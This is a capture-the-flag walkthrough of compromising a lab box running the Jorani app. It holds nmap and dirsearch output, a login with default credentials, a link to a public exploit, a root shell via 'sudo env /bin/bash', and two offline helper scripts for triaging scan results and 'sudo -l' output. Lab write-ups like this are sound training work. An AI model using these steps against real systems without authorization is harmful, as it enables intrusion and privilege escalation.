Jordak pg walkthrough Intermediate
NMAP
┌──(root㉿kali)-[/home/ftpuserr]
└─# nmap -p- -A 192.168.226.109
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-21 05:44 UTC
Nmap scan report for 192.168.226.109
Host is up (0.071s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 76:18:f1:19:6b:29:db:da:3d:f6:7b:ab:f4:b5:63:e0 (ECDSA)
|_ 256 cb:d8:d6:ef:82:77:8a:25:32:08:dd:91:96:8d:ab:7d (ED25519)
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: Apache/2.4.58 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=11/21%OT=22%CT=1%CU=36412%PV=Y%DS=4%DC=T%G=Y%TM=673
OS:EC903%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=104%TI=Z%CI=Z%TS=A)SEQ(
OS:SP=104%GCD=1%ISR=104%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=104%GCD=2%ISR=104%TI=Z%C
OS:I=Z%II=I%TS=A)OPS(O1=M578ST11NW7%O2=M578ST11NW7%O3=M578NNT11NW7%O4=M578S
OS:T11NW7%O5=M578ST11NW7%O6=M578ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5
OS:=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M578NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%
OS:T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T
OS:=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL
OS:=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 73.12 ms 192.168.45.1
2 73.10 ms 192.168.45.254
3 73.73 ms 192.168.251.1
4 73.88 ms 192.168.226.109
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.83 seconds
dirsearch
┌──(root㉿kali)-[/home/ftpuserr]
└─# dirsearch -u 192.168.226.109
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
dirsearch v0.4.3
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/ftpuserr/reports/_192.168.226.109/_24-11-21_05-50-26.txt
Target: http://192.168.226.109/
[05:50:26] Starting:
[05:50:27] 400 - 1KB - /!.htaccess
[05:50:27] 400 - 1KB - /!.htpasswd
[05:50:27] 404 - 277B - /jsp
[05:50:27] 404 - 277B - /jsp.old
[05:50:27] 403 - 280B - /%3f/
[05:50:27] 400 - 1KB - /!.gitignore
[05:50:27] 404 - 277B - /js
[05:50:27] 404 - 277B - /js.old
[05:50:27] 404 - 277B - /js.php
[05:50:27] 404 - 277B - /jsp.tar
[05:50:27] 404 - 277B - /js.tar
[05:50:27] 404 - 277B - /jsp.tgz
[05:50:27] 404 - 277B - /js.tgz
[05:50:27] 404 - 277B - /jsp.txt
[05:50:27] 404 - 277B - /js.txt
[05:50:27] 404 - 277B - /jsp.zip
[05:50:27] 404 - 277B - /js.zip
[05:50:27] 400 - 1KB - /+CSCOE+/logon.html
[05:50:27] 400 - 1KB - /+CSCOE+/session_password.html
[05:50:27] 400 - 1KB - /+CSCOT+/oem
[05:50:27] 400 - 1KB - /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
[05:50:27] 400 - 1KB - /+CSCOT+/translation
[05:50:28] 400 - 1KB - /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
[05:50:28] 404 - 277B - /js.bak
[05:50:28] 404 - 277B - /jsp.bak
[05:50:28] 404 - 277B - /jsp.php
[05:50:29] 400 - 1KB - /.config/psi+/profiles/default/accounts.xml
[05:50:32] 200 - 505B - /.gitattributes
[05:50:32] 200 - 477B - /.gitignore
[05:50:32] 404 - 277B - /.gitignore/
[05:50:33] 403 - 280B - /.ht_wsr.txt
[05:50:33] 403 - 280B - /.htaccess.bak1
[05:50:33] 403 - 280B - /.htaccess.orig
[05:50:33] 403 - 280B - /.htaccess.sample
[05:50:33] 403 - 280B - /.htaccess.save
[05:50:33] 403 - 280B - /.htaccess_extra
[05:50:33] 403 - 280B - /.htaccess_orig
[05:50:33] 403 - 280B - /.htaccess_sc
[05:50:33] 403 - 280B - /.htaccessBAK
[05:50:33] 403 - 280B - /.htaccessOLD
[05:50:33] 403 - 280B - /.htaccessOLD2
[05:50:33] 403 - 280B - /.htm
[05:50:33] 403 - 280B - /.html
[05:50:33] 403 - 280B - /.htpasswd_test
[05:50:33] 403 - 280B - /.htpasswds
[05:50:33] 403 - 280B - /.httr-oauth
[05:50:33] 400 - 1KB - /.idea/workspace(2).xml
[05:50:33] 400 - 1KB - /.idea/workspace(3).xml
[05:50:33] 400 - 1KB - /.idea/workspace(4).xml
[05:50:33] 400 - 1KB - /.idea/workspace(5).xml
[05:50:34] 400 - 1KB - /.idea/workspace(6).xml
[05:50:34] 400 - 1KB - /.idea/workspace(7).xml
[05:50:36] 403 - 280B - /.php
[05:50:43] 400 - 1KB - /;/admin
[05:50:43] 400 - 1KB - /;/json
[05:50:43] 400 - 1KB - /;/login
[05:50:43] 400 - 1KB - /;admin/
[05:50:43] 400 - 1KB - /;json/
[05:50:43] 400 - 1KB - /;login/
[05:50:43] 400 - 1KB - /@
[05:50:47] 400 - 1KB - /actuator/;/auditevents
[05:50:47] 400 - 1KB - /actuator/;/auditLog
[05:50:47] 400 - 1KB - /actuator/;/beans
[05:50:47] 400 - 1KB - /actuator/;/caches
[05:50:47] 400 - 1KB - /actuator/;/conditions
[05:50:47] 400 - 1KB - /actuator/;/configprops
[05:50:47] 400 - 1KB - /actuator/;/configurationMetadata
[05:50:47] 400 - 1KB - /actuator/;/dump
[05:50:47] 400 - 1KB - /actuator/;/env
[05:50:47] 400 - 1KB - /actuator/;/exportRegisteredServices
[05:50:47] 400 - 1KB - /actuator/;/flyway
[05:50:47] 400 - 1KB - /actuator/;/heapdump
[05:50:47] 400 - 1KB - /actuator/;/info
[05:50:47] 400 - 1KB - /actuator/;/liquibase
[05:50:47] 400 - 1KB - /actuator/;/logfile
[05:50:47] 400 - 1KB - /actuator/;/loggingConfig
[05:50:47] 400 - 1KB - /actuator/;/mappings
[05:50:47] 400 - 1KB - /actuator/;/events
[05:50:47] 400 - 1KB - /actuator/;/refresh
[05:50:47] 400 - 1KB - /actuator/;/registeredServices
[05:50:47] 400 - 1KB - /actuator/;/features
[05:50:47] 400 - 1KB - /actuator/;/health
[05:50:47] 400 - 1KB - /actuator/;/healthcheck
[05:50:47] 400 - 1KB - /actuator/;/resolveAttributes
[05:50:47] 400 - 1KB - /actuator/;/httptrace
[05:50:47] 400 - 1KB - /actuator/;/sessions
[05:50:47] 400 - 1KB - /actuator/;/integrationgraph
[05:50:47] 400 - 1KB - /actuator/;/springWebflow
[05:50:47] 400 - 1KB - /actuator/;/jolokia
[05:50:47] 400 - 1KB - /actuator/;/statistics
[05:50:47] 400 - 1KB - /actuator/;/loggers
[05:50:47] 400 - 1KB - /actuator/;/status
[05:50:47] 400 - 1KB - /actuator/;/metrics
[05:50:47] 400 - 1KB - /actuator/;/trace
[05:50:47] 400 - 1KB - /actuator/;/prometheus
[05:50:47] 400 - 1KB - /actuator/;/releaseAttributes
[05:50:47] 400 - 1KB - /actuator/;/scheduledtasks
[05:50:47] 400 - 1KB - /actuator/;/shutdown
[05:50:47] 400 - 1KB - /actuator/;/sso
[05:50:47] 400 - 1KB - /actuator/;/ssoSessions
[05:50:47] 400 - 1KB - /actuator/;/threaddump
[05:50:49] 403 - 280B - /admin%20/
[05:50:52] 400 - 1KB - /Admin;/
[05:50:52] 400 - 1KB - /admin;/
[05:51:06] 403 - 280B - /application
[05:51:07] 403 - 280B - /application/
[05:51:07] 403 - 280B - /application/cache/
[05:51:07] 403 - 280B - /application/configs/application.ini
[05:51:07] 403 - 280B - /application/logs/
[05:51:07] 301 - 319B - /assets -> http://192.168.226.109/assets/
[05:51:07] 200 - 644B - /assets/
[05:51:16] 200 - 973B - /composer.json
[05:51:16] 200 - 89KB - /composer.lock
[05:51:20] 404 - 277B - /css
[05:51:20] 404 - 277B - /css.php
[05:51:23] 200 - 499B - /docker-compose.yml
[05:51:23] 200 - 495B - /docker/
[05:51:23] 200 - 879B - /Dockerfile
[05:51:24] 301 - 317B - /docs -> http://192.168.226.109/docs/
[05:51:24] 200 - 557B - /docs/
[05:51:28] 200 - 111KB - /favicon.ico
[05:51:36] 404 - 277B - /index.php-bak
[05:51:36] 404 - 277B - /index.php.
[05:51:36] 404 - 277B - /index.php.bak
[05:51:36] 404 - 277B - /index.php3
[05:51:36] 404 - 277B - /index.php4
[05:51:36] 404 - 277B - /index.php5
[05:51:36] 404 - 277B - /index.php::$DATA
[05:51:36] 404 - 277B - /index.php~
[05:51:38] 400 - 1KB - /jkstatus;
[05:51:38] 400 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
[05:51:38] 400 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[05:51:38] 400 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo
[05:51:38] 400 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd
[05:51:38] 400 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[05:51:38] 400 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned
[05:51:38] 400 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[05:51:38] 400 - 1KB - /jolokia/exec/java.lang:type=Memory/gc
[05:51:38] 400 - 1KB - /jolokia/write/java.lang:type=Memory/Verbose/true
[05:51:38] 404 - 277B - /js/
[05:51:38] 404 - 277B - /js/elfinder/elfinder.php
[05:51:38] 400 - 1KB - /jolokia/read/java.lang:type=*/HeapMemoryUsage
[05:51:38] 404 - 277B - /js/envConfig.js
[05:51:38] 400 - 1KB - /jolokia/search/*:j2eeType=J2EEServer,*
[05:51:38] 400 - 1KB - /jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[05:51:38] 404 - 277B - /js/FCKeditor
[05:51:38] 404 - 277B - /js/prepod.js
[05:51:38] 404 - 277B - /js/qa.js
[05:51:38] 404 - 277B - /js/routing
[05:51:38] 404 - 277B - /js/swfupload/swfupload.swf
[05:51:38] 404 - 277B - /js/swfupload/swfupload_f9.swf
[05:51:38] 404 - 277B - /js/config.js
[05:51:38] 404 - 277B - /js/tiny_mce
[05:51:38] 404 - 277B - /js/tinymce
[05:51:38] 404 - 277B - /js/tiny_mce/
[05:51:38] 404 - 277B - /js/yui/uploader/assets/uploader.swf
[05:51:38] 404 - 277B - /js/ZeroClipboard.swf
[05:51:38] 404 - 277B - /jscripts
[05:51:38] 404 - 277B - /jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
[05:51:38] 404 - 277B - /js/prod.js
[05:51:38] 404 - 277B - /jscripts/tinymce
[05:51:38] 404 - 277B - /jscripts/tiny_mce/
[05:51:38] 404 - 277B - /jscripts/tiny_mce
[05:51:38] 404 - 277B - /jscripts/tinymce/
[05:51:38] 404 - 277B - /json
[05:51:38] 404 - 277B - /jsp-examples/
[05:51:38] 404 - 277B - /jsp-reverse.jsp
[05:51:38] 404 - 277B - /jsp/extension/login.jsp
[05:51:38] 404 - 277B - /jsp/help
[05:51:38] 404 - 277B - /jsp/viewer/snoop.jsp
[05:51:38] 404 - 277B - /jspbuild
[05:51:38] 404 - 277B - /js/tinymce/
[05:51:38] 404 - 277B - /jspm_packages/
[05:51:38] 404 - 277B - /jsps
[05:51:38] 404 - 277B - /js/ZeroClipboard10.swf
[05:51:38] 404 - 277B - /jssresource/
[05:51:38] 404 - 277B - /jscripts/
[05:51:40] 200 - 34KB - /LICENSE
[05:51:40] 403 - 280B - /local
[05:51:40] 403 - 280B - /local/
[05:51:40] 403 - 280B - /local/composer.lock
[05:51:40] 403 - 280B - /local/composer.phar
[05:51:41] 403 - 280B - /login.wdm%20
[05:51:47] 403 - 280B - /New%20Folder
[05:51:47] 403 - 280B - /New%20folder%20(2)
[05:51:52] 403 - 280B - /phpliteadmin%202.php
[05:51:52] 400 - 1KB - /phpmyadmin!!
[05:51:54] 200 - 278B - /phpunit.xml
[05:51:58] 403 - 280B - /Read%20Me.txt
[05:51:58] 200 - 5KB - /README.md
[05:52:00] 200 - 28B - /robots.txt
[05:52:00] 404 - 277B - /robots.txt.dist
[05:52:02] 400 - 1KB - /secure/ConfigurePortalPages!default.jspa?view=popular
[05:52:02] 400 - 1KB - /secure/ContactAdministrators!default.jspa
[05:52:02] 400 - 1KB - /secure/QueryComponent!Default.jspa
[05:52:02] 403 - 280B - /server-status
[05:52:02] 403 - 280B - /server-status/
[05:52:06] 301 - 316B - /sql -> http://192.168.226.109/sql/
[05:52:06] 200 - 629B - /sql/
[05:52:09] 403 - 280B - /system
[05:52:09] 403 - 280B - /system/
[05:52:09] 403 - 280B - /system/cache/
[05:52:09] 403 - 280B - /system/cron/cron.txt
[05:52:09] 403 - 280B - /system/error.txt
[05:52:09] 403 - 280B - /system/expressionengine/config/config.php
[05:52:09] 403 - 280B - /system/expressionengine/config/database.php
[05:52:09] 403 - 280B - /system/log/
[05:52:09] 403 - 280B - /system/logs/
[05:52:09] 403 - 280B - /system/storage/
[05:52:11] 301 - 318B - /tests -> http://192.168.226.109/tests/
[05:52:11] 200 - 531B - /tests/
[05:52:12] 400 - 1KB - /Trace.axd::$DATA
[05:52:12] 400 - 1KB - /typo3conf/ext/static_info_tables/ext_tables_static+adt-orig.sql
[05:52:12] 400 - 1KB - /typo3conf/ext/static_info_tables/ext_tables_static+adt.sql
[05:52:15] 200 - 0B - /vendor/autoload.php
[05:52:15] 200 - 729B - /vendor/
[05:52:15] 200 - 0B - /vendor/composer/autoload_classmap.php
[05:52:15] 200 - 0B - /vendor/composer/autoload_files.php
[05:52:15] 200 - 0B - /vendor/composer/autoload_namespaces.php
[05:52:15] 200 - 0B - /vendor/composer/autoload_psr4.php
[05:52:15] 200 - 0B - /vendor/composer/autoload_real.php
[05:52:15] 200 - 0B - /vendor/composer/autoload_static.php
[05:52:15] 200 - 0B - /vendor/composer/ClassLoader.php
[05:52:15] 200 - 1KB - /vendor/composer/LICENSE
[05:52:15] 200 - 80KB - /vendor/composer/installed.json
[05:52:18] 400 - 1KB - /web.config::$DATA
[05:52:20] 400 - 1KB - /wp-content/plugins/boldgrid-backup/=
[05:52:21] 400 - 1KB - /wps/contenthandler/!ut/p/digest!8skKFbWr_TwcZcvoc9Dn3g/?uri=http://www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&RedirectTo=http://example.com
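Most of the dirsearch report above is 400/403/404 noise from wordlist paths; the hits that matter are the handful of 200s that expose build and deployment metadata (composer.json, composer.lock, Dockerfile, docker-compose.yml, README.md, /sql/). As an added example, not part of the original write-up and not a dirsearch feature, the shell functions below read dirsearch's terminal output, keep only hits that actually served content, and flag the paths that reveal how the application is built. The sample lines are copied from the scan above (no live requests are made) and the "sensitive" pattern list is this example's own heuristic.

```shell
#!/usr/bin/env bash
# Added example: triage a dirsearch report so the interesting hits stand out.
# Report line format (dirsearch 0.4.x): [time] status - size - path [-> redirect]

# Sample lines copied from the scan above (no live requests are made).
SAMPLE_REPORT='[05:50:32] 200 - 505B - /.gitattributes
[05:50:32] 200 - 477B - /.gitignore
[05:50:33] 403 - 280B - /.htaccess.bak1
[05:51:16] 200 - 973B - /composer.json
[05:51:16] 200 - 89KB - /composer.lock
[05:51:23] 200 - 499B - /docker-compose.yml
[05:51:23] 200 - 879B - /Dockerfile
[05:51:28] 200 - 111KB - /favicon.ico
[05:51:38] 400 - 1KB - /jolokia/exec/java.lang:type=Memory/gc
[05:51:40] 200 - 34KB - /LICENSE
[05:51:54] 200 - 278B - /phpunit.xml
[05:51:58] 200 - 5KB - /README.md
[05:52:02] 403 - 280B - /server-status
[05:52:06] 301 - 316B - /sql -> http://192.168.226.109/sql/
[05:52:15] 200 - 80KB - /vendor/composer/installed.json'

# Paths that typically expose how a PHP app is built or deployed. This list is
# the example's own heuristic; extend it for other stacks.
SENSITIVE_RE='composer\.(json|lock)|installed\.json|dockerfile|docker-compose|/\.git|phpunit\.xml|readme|/sql/?$'

# Read a report on stdin; print "<status> <path>" for every hit that served
# content (2xx or 3xx). 400/403/404 entries are dropped.
served_paths() {
  awk '$2 ~ /^[23][0-9][0-9]$/ { print $2, $6 }'
}

# Read a report on stdin; print only the served paths matching SENSITIVE_RE.
sensitive_paths() {
  served_paths | grep -Ei "$SENSITIVE_RE"
}

# Wrappers over the embedded sample so the results can be checked.
sample_served_count() {
  printf '%s\n' "$SAMPLE_REPORT" | served_paths | wc -l | tr -d ' '
}
sample_sensitive_count() {
  printf '%s\n' "$SAMPLE_REPORT" | sensitive_paths | wc -l | tr -d ' '
}

# Run stand-alone: print the flagged paths from the sample.
printf '%s\n' "$SAMPLE_REPORT" | sensitive_paths
```

In practice, capture the scan with `dirsearch -u <target> | tee report.txt` and run `sensitive_paths < report.txt`; on this box the ten flagged paths are exactly the ones that identify the application, which is the step the rest of the write-up hinges on.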
The output is fairly cluttered; after digging through the pages for quite a while I found a configuration file.
Visiting that directory turned up a login page.
Searched online for the default password:
https://github.com/bbalet/jorani/blob/master/docs/install/README.md
Login succeeded.
Next, figure out how to get a shell.
Then I got stuck: couldn't find anything, not a single exploitation point.
Searched everywhere for exploits and none of them worked.
Went straight to the walkthrough.
The answer there was also found by searching for an exploit, so my information-gathering skills are clearly still too weak.
https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py
I need to study Google search syntax properly.
The shell the exploit returns is unstable, so we spawn another one ourselves.
Privilege escalation is very simple:
sudo env /bin/bash and that's it.
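The escalation works because sudo lets this user run env as root, and env just executes whatever program it is handed, so `sudo env /bin/bash` is a root shell with no further trick. As an added example, not from the write-up, the shell functions below take the text of `sudo -l`, list the permitted commands, and flag the ones that hand back a shell. The `sudo -l` text is constructed in the format sudo prints, with placeholder user and host names; the /usr/bin/env entry mirrors the grant used on this box, the systemctl line is added only as a non-escapable contrast, and the list of escapable binaries is the example's own short one.

```shell
#!/usr/bin/env bash
# Added example: read `sudo -l` output and flag entries that give a root shell.

# Constructed `sudo -l` output. The /usr/bin/env entry mirrors the grant on this
# box; user/host names are placeholders and the systemctl line is a contrast.
SAMPLE_SUDO_L='Matching Defaults entries for user on host:
    env_reset, mail_badpass

User user may run the following commands on host:
    (ALL) NOPASSWD: /usr/bin/env
    (root) /usr/bin/systemctl status apache2'

# Programs that run an arbitrary command or drop to a shell when executed as
# root. Deliberately short; GTFOBins has the complete list.
SHELL_ESCAPES='env bash sh dash python3 perl vim vi less more find awk'

# Read `sudo -l` text on stdin; print one permitted command per line with the
# "(runas)" and "TAG:" prefixes removed.
permitted_commands() {
  awk '
    /may run the following commands/ { in_cmds = 1; next }
    in_cmds && NF {
      sub(/^[ \t]*\([^)]*\)[ \t]*/, "")            # drop "(ALL)" / "(root)"
      while (sub(/^[A-Z]+:[ \t]*/, "")) {}         # drop "NOPASSWD:", "SETENV:" ...
      print
    }'
}

# Read `sudo -l` text on stdin; print "<program> <full command>" for each
# permitted command whose program is in SHELL_ESCAPES.
shell_escapes() {
  permitted_commands | while IFS= read -r cmd; do
    prog=${cmd%% *}          # first word is the program path
    base=${prog##*/}         # e.g. /usr/bin/env -> env
    case " $SHELL_ESCAPES " in
      *" $base "*) printf '%s %s\n' "$base" "$cmd" ;;
    esac
  done
}

# The sudo invocation that turns a flagged program into a root shell.
# env spawns whatever it is given, so `sudo env /bin/bash` is the whole chain.
escape_command() {
  case "$1" in
    env)          printf 'sudo env /bin/bash\n' ;;
    bash|sh|dash) printf 'sudo %s\n' "$1" ;;
    *)            printf 'look up %s on GTFOBins\n' "$1" ;;
  esac
}

# Run stand-alone against the sample.
printf '%s\n' "$SAMPLE_SUDO_L" | shell_escapes | while read -r base cmd; do
  printf '%s -> %s\n' "$cmd" "$(escape_command "$base")"
done
```

On a target, `sudo -l | shell_escapes` gives the same triage against the real policy. From the defender's side the fix is in sudoers: a rule granting env (or any binary that executes its arguments) is equivalent to granting ALL, regardless of NOPASSWD.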
The hardest part is still information gathering; I simply could not find the exploit.
Afterwards I summed it up:
you can search directly like this:
jorani cve site:github.com
intext:jorani cve site:github.com